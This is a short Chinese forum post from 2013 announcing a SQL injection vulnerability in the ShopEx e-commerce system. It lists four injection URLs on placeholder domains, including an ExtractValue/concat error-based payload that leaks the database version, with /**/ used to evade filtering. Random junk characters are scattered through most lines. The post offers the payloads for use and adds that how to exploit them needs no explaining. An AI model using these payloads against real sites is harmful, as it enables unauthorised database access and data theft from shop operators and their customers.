注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…2 ~4 ^% Y# t9 V9 C: v; D, p4 F
" ~, V! d& t0 A% n好吧,我扯远了~~- A- ?+ X/ c. j/ _' W4 s
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
) F. u/ x- R/ U0 a: p( W& P不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:+ A' s L8 \& X" c4 A, @
V+ \- t& ~; m# a! X$ f- a8 o' chttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html6 y+ o! ^) V; F3 P# \4 \' l: l2 r) v
; |- @6 x" L; g. K4 z8 P# U9 Rhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
; N( b% A: x, K' [4 i( L# s
" C% X) x4 x! Dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
, \% |7 O3 N: y1 Q/ ^% B% L0 ]& ~+ n: |
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
; E8 v6 A, f6 y& L$ F& A9 l& k$ W
% t* |& S0 E# N6 ~3 [) R% L s一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
) Y8 `" J0 v9 a+ T$ L5 m" H. d如何注入就不多说了,10多年的东西了…不会也会了…
) J$ j# A2 v9 y6 Q. t
7 I% t* u: Y4 I |
发表于 2013-2-4 16:20:04
收藏
支持
反对